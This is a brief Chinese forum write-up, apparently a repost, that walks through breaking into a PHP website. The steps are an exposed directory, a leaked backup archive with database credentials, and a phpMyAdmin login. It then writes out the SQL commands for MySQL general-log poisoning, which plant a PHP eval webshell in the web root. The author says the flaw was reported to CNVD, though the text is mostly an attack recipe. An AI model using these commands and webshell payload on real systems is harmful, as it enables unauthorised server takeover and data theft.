第一漏洞挖掘全过程
2022-1-24 21:28:29 Author: forum.90sec.com(查看原文) 阅读量:18 收藏

1、被测网站
image
2、使用cmd命令查询该网站ip地址,
image
3、使用ip直接访问,改地址可直接下载文件(猜测应该是配置失误导致)

image

4、发现该目录下有备份文件xxx.rar下载该文件
5、找到文件中的敏感文件

image

6、里面有数据库账号密码;

image

7、因为是php搭建有phpmyadmin使用phpmyadmin登陆

image

8、直接使用sql写入getshell
9、通过写入日志文件getshell
10、读写权限+web绝对路径,修改日志文件为webshell
具体利用方法如下:
(1) 开启日志记录:
set global general_log = "ON";
(2) 查看当前的日志目录:
show variables like 'general%';
(3) 指定日志文件(目录结构可以直接访问phpinfo)
set global general_log_file = "C:/phpStudy/WWW/404.php";
(4)写入执行代码:
select "<?php [email protected]$_POST['b'];eval('$string');?>";

image

最后getshell连接

image

已上传到CNVD

image

文章来源: https://forum.90sec.com/t/topic/1997
如有侵权请联系:admin#unsafe.sh